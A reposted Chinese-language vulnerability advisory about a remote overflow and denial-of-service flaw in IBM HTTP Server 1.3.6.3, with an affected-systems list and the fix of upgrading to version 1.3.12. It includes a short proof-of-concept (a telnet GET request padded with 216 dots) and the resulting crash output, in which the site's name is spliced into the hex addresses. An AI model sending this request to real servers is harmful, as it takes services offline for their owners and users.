IBM HTTP Server 远程溢出漏洞_JSP技巧_黑客防线网安服务器维护基地--Powered by WWW.RONGSEN.COM.CN

IBM HTTP Server 远程溢出漏洞

作者:黑客防线网安JSP教程基地 来源:黑客防线网安JSP教程基地 浏览次数:0

本篇关键词:溢出漏洞远程Linux
黑客防线网安网讯:涉及程序:   GET     描述:   通过提交超长的GET请求导致IBM HTTP Server远程溢出      详细:   IBM 的 HTTP 服务器是一个 web 服务器。在 Windows NT 使用的版本中存在...
涉及程序:
   GET
  
   描述:
   通过提交超长的GET请求导致IBM HTTP Server远程溢出
  
  
   详细:
   IBM 的 HTTP 服务器是一个 web 服务器在 Windows NT 使用的版本中存在拒绝服务的漏洞
  
   如果提交一个超过219个字符的 GET 请求将导致服务器停止响应并报错。要恢复服务正常工作需要重新启动应用程序。成功的利用该漏洞,攻击者可在受害的主机上执行任何代码。(但这还未得到完全证实。)
  
  
   以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
  
  
   $ telnet target 80
   GET /......(216个".")aaa HTTP/1.0
  
   则系统会报告下列错误信息:
   ***STOP:0x0000001e(0X00000005,0X804B3黑客防线1,0X00000000,0X00000000)KMODE_EXCEPTI
   ON_NOT_HANDLED.
   ***Address 804B3黑客防线1 base at 80400000,Datastamp 384D9B17-ntoskrnl.exe
   注意:目标主机运行在Windows 2000下。
  
   受影响的系统
   IBM HTTP Server 1.3.6.3
   - TurboLinux Turbo Linux 3.0.1
   - Sun Solaris 2.6
   - S.u.S.E. Linux 6.1
   - S.u.S.E. Linux 6.0
   - RedHat Linux 6.0 sparc
   - RedHat Linux 5.2 sparc
   - Microsoft Windows NT 4.0
   - IBM AIX 4.2.1
   - Caldera OpenLinux 2.2
  
   解决方案:
   IBM 已经在 1.3.12 版本中解决了此问题,下载地址:
   http://www-4.ibm.com/software/webservers/httpservers/download.html
  
  
    黑客防线网安服务器维护方案本篇连接:http://www.rongsen.com.cn/show-16601-1.html
网站维护教程更新时间:2012-04-07 00:43:35  【打印此页】  【关闭
我要申请本站N点 | 黑客防线官网 |  
专业服务器维护及网站维护手工安全搭建环境,网站安全加固服务。黑客防线网安服务器维护基地招商进行中!QQ:29769479

footer  footer  footer  footer